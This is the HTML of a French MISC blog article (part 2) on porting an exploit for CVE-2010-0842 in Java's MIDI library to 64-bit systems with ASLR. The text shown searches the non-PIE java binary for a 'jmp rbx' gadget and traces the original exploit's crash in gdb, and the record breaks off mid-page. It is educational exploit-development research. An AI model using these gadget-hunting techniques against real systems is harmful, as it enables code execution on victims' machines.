<!DOCTYPE html>
<html lang="fr-FR">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0">
<title>Architecture 64 bits/ASLR : quelles conséquences pour les exploits 32 bits ? Étude de cas avec Java et le CVE-2010-0842 &#8211; Partie 2/2 | Le blog de MISC</title>
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="http://www.miscmag.com/xmlrpc.php" />

<link rel="apple-touch-icon" sizes="57x57" href="/apple-touch-icon-57x57.png">
<link rel="apple-touch-icon" sizes="114x114" href="/apple-touch-icon-114x114.png">
<link rel="apple-touch-icon" sizes="72x72" href="/apple-touch-icon-72x72.png">
<link rel="apple-touch-icon" sizes="144x144" href="/apple-touch-icon-144x144.png">
<link rel="apple-touch-icon" sizes="60x60" href="/apple-touch-icon-60x60.png">
<link rel="apple-touch-icon" sizes="120x120" href="/apple-touch-icon-120x120.png">
<link rel="apple-touch-icon" sizes="76x76" href="/apple-touch-icon-76x76.png">
<link rel="apple-touch-icon" sizes="152x152" href="/apple-touch-icon-152x152.png">
<link rel="icon" type="image/png" href="/favicon-196x196.png" sizes="196x196">
<link rel="icon" type="image/png" href="/favicon-160x160.png" sizes="160x160">
<link rel="icon" type="image/png" href="/favicon-96x96.png" sizes="96x96">
<link rel="icon" type="image/png" href="/favicon-16x16.png" sizes="16x16">
<link rel="icon" type="image/png" href="/favicon-32x32.png" sizes="32x32">
<meta name="msapplication-TileColor" content="#ee6f08">
<meta name="msapplication-TileImage" content="/mstile-144x144.png">

<!--[if lt IE 9]>
<script src="http://www.miscmag.com/wp-content/themes/mon-cahierMISC/js/html5.js" type="text/javascript"></script>
<![endif]-->

<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Le blog de MISC &raquo; Flux" href="http://www.miscmag.com/?feed=rss2" />
<link rel="alternate" type="application/rss+xml" title="Le blog de MISC &raquo; Flux des commentaires" href="http://www.miscmag.com/?feed=comments-rss2" />
<link rel="alternate" type="application/rss+xml" title="Le blog de MISC &raquo; Architecture 64 bits/ASLR : quelles conséquences pour les exploits 32 bits ? Étude de cas avec Java et le CVE-2010-0842 &#8211; Partie 2/2 Flux des commentaires" href="http://www.miscmag.com/?feed=rss2&#038;p=630" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.miscmag.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.8.1"}};
			!function(a,b,c){function d(a){var b,c,d,e,f=String.fromCharCode;if(!k||!k.fillText)return!1;switch(k.clearRect(0,0,j.width,j.height),k.textBaseline="top",k.font="600 32px Arial",a){case"flag":return k.fillText(f(55356,56826,55356,56819),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,56826,8203,55356,56819),0,0),c=j.toDataURL(),b===c&&(k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447),0,0),c=j.toDataURL(),b!==c);case"emoji4":return k.fillText(f(55358,56794,8205,9794,65039),0,0),d=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55358,56794,8203,9794,65039),0,0),e=j.toDataURL(),d!==e}return!1}function e(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i,j=b.createElement("canvas"),k=j.getContext&&j.getContext("2d");for(i=Array("flag","emoji4"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='crayon-css'  href='http://www.miscmag.com/wp-content/plugins/crayon-syntax-highlighter/css/min/crayon.min.css?ver=_2.7.2_beta' type='text/css' media='all' />
<link rel='stylesheet' id='crayon-theme-classic-css'  href='http://www.miscmag.com/wp-content/plugins/crayon-syntax-highlighter/themes/classic/classic.css?ver=_2.7.2_beta' type='text/css' media='all' />
<link rel='stylesheet' id='crayon-theme-dark-terminal-css'  href='http://www.miscmag.com/wp-content/plugins/crayon-syntax-highlighter/themes/dark-terminal/dark-terminal.css?ver=_2.7.2_beta' type='text/css' media='all' />
<link rel='stylesheet' id='crayon-font-monaco-css'  href='http://www.miscmag.com/wp-content/plugins/crayon-syntax-highlighter/fonts/monaco.css?ver=_2.7.2_beta' type='text/css' media='all' />
<link rel='stylesheet' id='gglcptch-css'  href='http://www.miscmag.com/wp-content/plugins/google-captcha/css/gglcptch.css?ver=1.30' type='text/css' media='all' />
<link rel='stylesheet' id='style-css'  href='http://www.miscmag.com/wp-content/themes/mon-cahierMISC/style.css?ver=4.8.1' type='text/css' media='all' />
<link rel='stylesheet' id='googleFonts-css'  href='http://fonts.googleapis.com/css?family=Cutive%7CReenie+Beanie&#038;ver=4.8.1' type='text/css' media='all' />
<link rel='stylesheet' id='dvk-social-sharing-css'  href='http://www.miscmag.com/wp-content/plugins/dvk-social-sharing/assets/css/styles.min.css?ver=1.2.7' type='text/css' media='all' />
<link rel='stylesheet' id='fancybox-css'  href='http://www.miscmag.com/wp-content/plugins/easy-fancybox/fancybox/jquery.fancybox-1.3.8.min.css?ver=1.6' type='text/css' media='screen' />
<script type='text/javascript' src='http://www.miscmag.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://www.miscmag.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var CrayonSyntaxSettings = {"version":"_2.7.2_beta","is_admin":"0","ajaxurl":"http:\/\/www.miscmag.com\/wp-admin\/admin-ajax.php","prefix":"crayon-","setting":"crayon-setting","selected":"crayon-setting-selected","changed":"crayon-setting-changed","special":"crayon-setting-special","orig_value":"data-orig-value","debug":""};
var CrayonSyntaxStrings = {"copy":"Faites %s pour copier, %s pour coller","minimize":"Click To Expand Code"};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.miscmag.com/wp-content/plugins/crayon-syntax-highlighter/js/min/crayon.min.js?ver=_2.7.2_beta'></script>
<link rel='https://api.w.org/' href='http://www.miscmag.com/index.php?rest_route=/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.miscmag.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.miscmag.com/wp-includes/wlwmanifest.xml" /> 
<link rel='prev' title='Architecture 64 bits/ASLR : quelles conséquences pour les exploits 32 bits ? Étude de cas avec Java et le CVE-2010-0842 &#8211; Partie 1/2' href='http://www.miscmag.com/?p=623' />
<link rel='next' title='IP Squatting appliqué au SPAM &#8211; Partie 1/2' href='http://www.miscmag.com/?p=637' />
<meta name="generator" content="WordPress 4.8.1" />
<link rel="canonical" href="http://www.miscmag.com/?p=630" />
<link rel='shortlink' href='http://www.miscmag.com/?p=630' />
<link rel="alternate" type="application/json+oembed" href="http://www.miscmag.com/index.php?rest_route=%2Foembed%2F1.0%2Fembed&#038;url=http%3A%2F%2Fwww.miscmag.com%2F%3Fp%3D630" />
<link rel="alternate" type="text/xml+oembed" href="http://www.miscmag.com/index.php?rest_route=%2Foembed%2F1.0%2Fembed&#038;url=http%3A%2F%2Fwww.miscmag.com%2F%3Fp%3D630&#038;format=xml" />
		<style>
			a {color: }
			a:hover {color: }
		</style>		
	<style type="text/css" id="custom-background-css">
body.custom-background { background-image: url("http://www.miscmag.com/wp-content/uploads/2017/01/Fotolia_107632854_Subscription_XXL-v2.jpg"); background-position: center center; background-size: cover; background-repeat: repeat; background-attachment: fixed; }
</style>

<!-- Easy FancyBox 1.6 using FancyBox 1.3.8 - RavanH (http://status301.net/wordpress-plugins/easy-fancybox/) -->
<script type="text/javascript">
/* <![CDATA[ */
var fb_timeout = null;
var fb_opts = { 'overlayShow' : true, 'hideOnOverlayClick' : true, 'showCloseButton' : true, 'margin' : 20, 'centerOnScroll' : true, 'enableEscapeButton' : true, 'autoScale' : true };
var easy_fancybox_handler = function(){
	/* IMG */
	var fb_IMG_select = 'a[href*=".jpg"]:not(.nolightbox,li.nolightbox>a), area[href*=".jpg"]:not(.nolightbox), a[href*=".jpeg"]:not(.nolightbox,li.nolightbox>a), area[href*=".jpeg"]:not(.nolightbox), a[href*=".png"]:not(.nolightbox,li.nolightbox>a), area[href*=".png"]:not(.nolightbox), a[href*=".webp"]:not(.nolightbox,li.nolightbox>a), area[href*=".webp"]:not(.nolightbox)';
	jQuery(fb_IMG_select).addClass('fancybox image');
	var fb_IMG_sections = jQuery('div.gallery ');
	fb_IMG_sections.each(function() { jQuery(this).find(fb_IMG_select).attr('rel', 'gallery-' + fb_IMG_sections.index(this)); });
	jQuery('a.fancybox, area.fancybox, li.fancybox a').fancybox( jQuery.extend({}, fb_opts, { 'transitionIn' : 'elastic', 'easingIn' : 'easeOutBack', 'transitionOut' : 'elastic', 'easingOut' : 'easeInBack', 'opacity' : false, 'hideOnContentClick' : false, 'titleShow' : true, 'titlePosition' : 'over', 'titleFromAlt' : true, 'showNavArrows' : true, 'enableKeyboardNav' : true, 'cyclic' : false }) );
}
var easy_fancybox_auto = function(){
	/* Auto-click */
	setTimeout(function(){jQuery('#fancybox-auto').trigger('click')},1000);
}
/* ]]> */
</script>
</head>

<body class="post-template-default single single-post postid-630 single-format-standard custom-background">




<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
  ga('create', 'UA-22350734-12', 'auto');
  ga('require', 'displayfeatures');
  ga('send', 'pageview');

</script>

<div id="page" class="hfeed site">
		<header id="masthead" class="site-header" role="banner">
<!--		<hgroup class="site-intro">
			<h1 class="site-title"><a href="http://www.miscmag.com/" title="Le blog de MISC" rel="home">Le blog de MISC</a></h1>
			<h2 class="site-description">100% sécurité informatique</h2>
		</hgroup> -->
		
		<!-- if there's a header image, let's display it here -->

		
			<a href="http://www.miscmag.com/" title="Le blog de MISC" rel="home"><img src="http://www.miscmag.com/wp-content/uploads/2017/01/blog_misc_bannier-2017.jpg" width="988" height="200" alt="" /></a>

		
		<nav role="navigation" class="site-navigation main-navigation">
			<h1 class="assistive-text">Menu &#9776</h1>
			<div class="assistive-text skip-link"><a href="#content" title="Passer directement au contenu">Passer directement au contenu</a></div>
			<div class="menu"><ul id="menu-menu-principal" class="menu"><li id="menu-item-13" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-13"><a href="http://www.miscmag.com/">Accueil</a></li>
<li id="menu-item-14" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-has-children menu-item-14"><a href="http://www.miscmag.com/">Le magazine</a>
<ul  class="sub-menu">
	<li id="menu-item-19" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-19"><a target="_blank" href="https://boutique.ed-diamond.com/23-anciens-numeros#/titre-misc">Derniers numéros</a></li>
	<li id="menu-item-20" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-20"><a target="_blank" href="https://boutique.ed-diamond.com/abonnements/7-misc">S&rsquo;abonner</a></li>
	<li id="menu-item-268" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-268"><a href="http://www.editions-diamond.fr/devenir-auteur/">Devenir auteur</a></li>
</ul>
</li>
<li id="menu-item-15" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-has-children menu-item-15"><a href="http://www.miscmag.com/">Nos autres magazines</a>
<ul  class="sub-menu">
	<li id="menu-item-21" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-21"><a target="_blank" href="https://boutique.ed-diamond.com/content/22-en-savoir-plus-sur-gnulinux-magazine">GNU/Linux Magazine</a></li>
	<li id="menu-item-22" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-22"><a target="_blank" href="https://boutique.ed-diamond.com/content/25-en-savoir-plus-sur-linux-pratique">Linux Pratique</a></li>
	<li id="menu-item-24" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-24"><a target="_blank" href="https://boutique.ed-diamond.com/content/23-en-savoir-plus-sur-hackable-magazine">Hackable</a></li>
</ul>
</li>
<li id="menu-item-559" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-has-children menu-item-559"><a href="http://www.miscmag.com/">Lecture en ligne</a>
<ul  class="sub-menu">
	<li id="menu-item-560" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-560"><a target="_blank" href="http://connect.ed-diamond.com/MISC">Découvrir Connect</a></li>
	<li id="menu-item-561" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-561"><a target="_blank" href="https://boutique.ed-diamond.com/27-base-documentaire">Abonnements particuliers à Connect</a></li>
	<li id="menu-item-573" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-573"><a target="_blank" href="https://proboutique.ed-diamond.com/abo-pro-basedoc">Abonnements professionnels à Connect</a></li>
</ul>
</li>
<li id="menu-item-18" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-has-children menu-item-18"><a href="http://www.miscmag.com/">La boutique</a>
<ul  class="sub-menu">
	<li id="menu-item-563" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-563"><a target="_blank" href="https://boutique.ed-diamond.com/">Particuliers</a></li>
	<li id="menu-item-564" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-564"><a target="_blank" href="https://proboutique.ed-diamond.com/">Professionnels</a></li>
</ul>
</li>
<li id="menu-item-17" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-17"><a href="http://www.miscmag.com/?page_id=9">À propos</a></li>
</ul></div>		</nav>
		
	 
	 <ul class="social-media">
							<li><a href="https://twitter.com/MISCRedac" class="twitter">Twitter</a></li>
			
						
						
						
						
						
			
						
						
						
						
						
			
							<li><a href="http://www.miscmag.com/?feed=rss2" class="rss">Flux RSS</a></li>
					</ul><!-- #social-icons-->
				
	</header><!-- #masthead .site-header -->

<aside id="widget_sp_image-12" class="widget_sp_image"><div align="center"><a href="http://connect.ed-diamond.com/MISC" target="_blank" class="widget_sp_image-image-link"><img width="960" height="150" class="attachment-full" style="max-width: 100%;" srcset="http://www.miscmag.com/wp-content/uploads/2017/03/banner-blogsMags-Connect-1MISC.jpg 960w, http://www.miscmag.com/wp-content/uploads/2017/03/banner-blogsMags-Connect-1MISC-300x47.jpg 300w, http://www.miscmag.com/wp-content/uploads/2017/03/banner-blogsMags-Connect-1MISC-768x120.jpg 768w" sizes="(max-width: 960px) 100vw, 960px" src="http://www.miscmag.com/wp-content/uploads/2017/03/banner-blogsMags-Connect-1MISC.jpg" /></a></div></aside>
	<div id="main">
		<div id="primary" class="site-content">
			<div id="content" role="main">

			
				
<article id="post-630" class="post-630 post type-post status-publish format-standard hentry category-article tag-64-bit tag-aslr tag-exploit tag-java tag-rop">
	<header class="entry-header">
		
					<h1 class="entry-title">Architecture 64 bits/ASLR : quelles conséquences pour les exploits 32 bits ? Étude de cas avec Java et le CVE-2010-0842 &#8211; Partie 2/2</h1>
				
		<div class="entrymeta">
			<time class="entry-date updated" datetime="2017-08-10T09:00:07+00:00" pubdate>10 août 2017</time><span class="byline"> par <span class="author vcard"><a class="url fn n" href="http://www.miscmag.com/?author=622" title="Voir tous les articles par redaction" rel="author">redaction</a></span></span>		</div><!-- .entry-meta -->
	</header><!-- .entry-header -->

	<div class="entry-content">
		<p><span style="font-family: Verdana, Geneva; font-size: 14px;"><span lang="fr-FR"><a href="http://www.miscmag.com/wp-content/uploads/2017/01/cc.png"><img class="alignnone size-full wp-image-503" src="http://www.miscmag.com/wp-content/uploads/2017/01/cc.png" alt="" width="80" height="15" /></a></span></span></p>
<p><span style="font-family: Verdana, Geneva; font-size: 14px;"><span lang="fr-FR">En exécutant le binaire plusieurs fois, nous remarquons que le programme java n’a pas été compilé avec l’option PIE (</span><i><span lang="fr-FR">Position Independent Code</span></i><span lang="fr-FR">), donc le binaire est toujours chargé à la même adresse. Et cela bien qu’ASLR soit activé et que les adresses de toutes les librairies et de la pile soient aléatoires. Ce binaire à adresse fixe est une mine d’or (ou plutôt de gadgets) pour l’analyste. Voyons voir si ce binaire contient un </span><b><span lang="fr-FR"><span style="color: #ff0000;">jmp</span> <span style="color: #ff0000;">rbx</span></span></b><span lang="fr-FR"> (</span><span style="color: #ff0000;"><b><span lang="fr-FR">0xFF 0xE3</span></b></span><span lang="fr-FR"> en hexadécimal). Pour ce faire, nous allons utiliser un des nombreux désassembleur</span><span lang="fr-FR">s</span> <b><span lang="fr-FR">[4] </span></b><span lang="fr-FR">pour obtenir une chaîne hexadécimale du binaire puis chercher ce qui nous intéresse.</span></span></p>
<p><span id="more-630"></span></p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->

		<div id="crayon-5997722bc47e3125236369" class="crayon-syntax crayon-theme-dark-terminal crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;">
		
			<div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span>
			<div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Afficher/cacher numéros de lignes"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Basculer vers code brut"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Ouvrir le code dans une nouvelle fenêtre"><div class="crayon-button-icon"></div></div></div></div>
			<div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div>
			<div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;">
$ grep -o ffe3 hexa.txt
$</textarea></div>
			<div class="crayon-main" style="">
				<table class="crayon-table">
					<tr class="crayon-row">
				<td class="crayon-nums " data-settings="show">
					<div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-5997722bc47e3125236369-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc47e3125236369-2">2</div></div>
				</td>
						<td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-5997722bc47e3125236369-1"><span class="crayon-sy">$</span><span class="crayon-h"> </span><span class="crayon-v">grep</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-i">o</span><span class="crayon-h"> </span><span class="crayon-e">ffe3 </span><span class="crayon-v">hexa</span><span class="crayon-sy">.</span><span class="crayon-i">txt</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc47e3125236369-2"><span class="crayon-sy">$</span></div></div></td>
					</tr>
				</table>
			</div>
		</div>
<!-- [Format Time: 0.0007 seconds] -->
<p><span style="font-family: Verdana, Geneva; font-size: 14px;"><span lang="fr-FR">Aucun résultat. Mais d’ailleurs, est-ce bien toujours </span><span style="color: #ff0000;"><b><span lang="fr-FR">rbx</span></b></span><span lang="fr-FR"> qui pointe vers le fichier midi en mémoire dans le binaire 64 bit</span><span lang="fr-FR">s</span><span lang="fr-FR"> ? Vérifions cela en lançant l’exploit original de Vreugdenhil et en indiquant à gdb de stopper lors d’une erreur de segmentation (SIGSEGV). Cela nous permettra d’arrêter le programme juste au moment où il est censé sauter à l’adresse d’une instruction </span><span style="color: #ff0000;"><b><span lang="fr-FR">jmp ebx</span></b></span><span lang="fr-FR">. Nous avons vu dans la section précédente que cette adresse est </span><span style="color: #ff0000;"><b><span lang="fr-FR">0x6d53cb6d</span></b></span><span lang="fr-FR">. Comme elle n’est pas mappé</span><span lang="fr-FR">e</span><span lang="fr-FR"> dans notre cas, cela produira une erreur de segmentation.</span></span></p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->

		<div id="crayon-5997722bc4801524881161" class="crayon-syntax crayon-theme-dark-terminal crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;">
		
			<div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span>
			<div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Afficher/cacher numéros de lignes"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Basculer vers code brut"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Ouvrir le code dans une nouvelle fenêtre"><div class="crayon-button-icon"></div></div></div></div>
			<div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div>
			<div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;">
(gdb) handle SIGSEGV stop
Signal   Stop  Print  Pass to program  Description
SIGSEGV  Yes   Yes    Yes              Segmentation fault
(gdb) c
Continuing.

Thread 22 "java" received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7f678d582700 (LWP 10447)]
0x000000006d53cb6d in ?? ()
(gdb) bt
#0 0x000000006d53cb6d in ?? ()
#1 0x00007f679e5abe66 in PV_CallControlCallbacks () from /opt/oracle-jre/jdk1.6.0_01/jre/lib/amd64/libjsound.so
#2 0x00007f679e5ae094 in PV_ProcessMidiSequencerSlice () from /opt/oracle-jre/jdk1.6.0_01/jre/lib/amd64/libjsound.so
#3 0x00007f679e5ae52b in PV_ProcessSequencerEvents () from /opt/oracle-jre/jdk1.6.0_01/jre/lib/amd64/libjsound.so
#4 0x00007f679e5b2036 in PV_ProcessSampleFrame () from /opt/oracle-jre/jdk1.6.0_01/jre/lib/amd64/libjsound.so
#5 0x00007f679e5b1d6b in HAE_BuildMixerSlice () from /opt/oracle-jre/jdk1.6.0_01/jre/lib/amd64/libjsound.so
#6 0x00007f679e5c02cd in PV_AudioWaveOutFrameThread () from /opt/oracle-jre/jdk1.6.0_01/jre/lib/amd64/libjsound.so
#7 0x00007f679e59e592 in Java_com_sun_media_sound_MixerThread_runNative () from /opt/oracle-jre/jdk1.6.0_01/jre/lib/amd64/libjsound.so
#8 0x00007f67e5013df7 in ?? ()
#9 0x0000000000000000 in ?? ()</textarea></div>
			<div class="crayon-main" style="">
				<table class="crayon-table">
					<tr class="crayon-row">
				<td class="crayon-nums " data-settings="show">
					<div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-5997722bc4801524881161-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc4801524881161-2">2</div><div class="crayon-num" data-line="crayon-5997722bc4801524881161-3">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc4801524881161-4">4</div><div class="crayon-num" data-line="crayon-5997722bc4801524881161-5">5</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc4801524881161-6">6</div><div class="crayon-num" data-line="crayon-5997722bc4801524881161-7">7</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc4801524881161-8">8</div><div class="crayon-num" data-line="crayon-5997722bc4801524881161-9">9</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc4801524881161-10">10</div><div class="crayon-num" data-line="crayon-5997722bc4801524881161-11">11</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc4801524881161-12">12</div><div class="crayon-num" data-line="crayon-5997722bc4801524881161-13">13</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc4801524881161-14">14</div><div class="crayon-num" data-line="crayon-5997722bc4801524881161-15">15</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc4801524881161-16">16</div><div class="crayon-num" data-line="crayon-5997722bc4801524881161-17">17</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc4801524881161-18">18</div><div class="crayon-num" data-line="crayon-5997722bc4801524881161-19">19</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc4801524881161-20">20</div></div>
				</td>
						<td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-5997722bc4801524881161-1"><span class="crayon-sy">(</span><span class="crayon-v">gdb</span><span class="crayon-sy">)</span><span class="crayon-h"> </span><span class="crayon-e">handle </span><span class="crayon-e">SIGSEGV </span><span class="crayon-e">stop</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc4801524881161-2"><span class="crayon-e">Signal&nbsp;&nbsp; </span><span class="crayon-e">Stop&nbsp;&nbsp;</span><span class="crayon-e">Print&nbsp;&nbsp;</span><span class="crayon-e">Pass </span><span class="crayon-st">to</span><span class="crayon-h"> </span><span class="crayon-e">program&nbsp;&nbsp;</span><span class="crayon-e">Description</span></div><div class="crayon-line" id="crayon-5997722bc4801524881161-3"><span class="crayon-e">SIGSEGV&nbsp;&nbsp;</span><span class="crayon-e">Yes&nbsp;&nbsp; </span><span class="crayon-e">Yes&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-e">Yes&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-e">Segmentation </span><span class="crayon-e">fault</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc4801524881161-4"><span class="crayon-sy">(</span><span class="crayon-v">gdb</span><span class="crayon-sy">)</span><span class="crayon-h"> </span><span class="crayon-i">c</span></div><div class="crayon-line" id="crayon-5997722bc4801524881161-5"><span class="crayon-v">Continuing</span><span class="crayon-sy">.</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc4801524881161-6">&nbsp;</div><div class="crayon-line" id="crayon-5997722bc4801524881161-7"><span class="crayon-i">Thread</span><span class="crayon-h"> </span><span class="crayon-cn">22</span><span class="crayon-h"> </span><span class="crayon-s">"java"</span><span class="crayon-h"> </span><span class="crayon-e">received </span><span class="crayon-e">signal </span><span class="crayon-v">SIGSEGV</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-e">Segmentation </span><span class="crayon-v">fault</span><span class="crayon-sy">.</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc4801524881161-8"><span class="crayon-sy">[</span><span class="crayon-e">Switching </span><span class="crayon-st">to</span><span class="crayon-h"> </span><span class="crayon-i">Thread</span><span class="crayon-h"> </span><span class="crayon-cn">0x7f678d582700</span><span class="crayon-h"> </span><span class="crayon-sy">(</span><span class="crayon-i">LWP</span><span class="crayon-h"> </span><span class="crayon-cn">10447</span><span class="crayon-sy">)</span><span class="crayon-sy">]</span></div><div class="crayon-line" id="crayon-5997722bc4801524881161-9"><span class="crayon-cn">0x000000006d53cb6d</span><span class="crayon-h"> </span><span class="crayon-st">in</span><span class="crayon-h"> </span><span class="crayon-sy">?</span><span class="crayon-sy">?</span><span class="crayon-h"> </span><span class="crayon-sy">(</span><span class="crayon-sy">)</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc4801524881161-10"><span class="crayon-sy">(</span><span class="crayon-v">gdb</span><span class="crayon-sy">)</span><span class="crayon-h"> </span><span 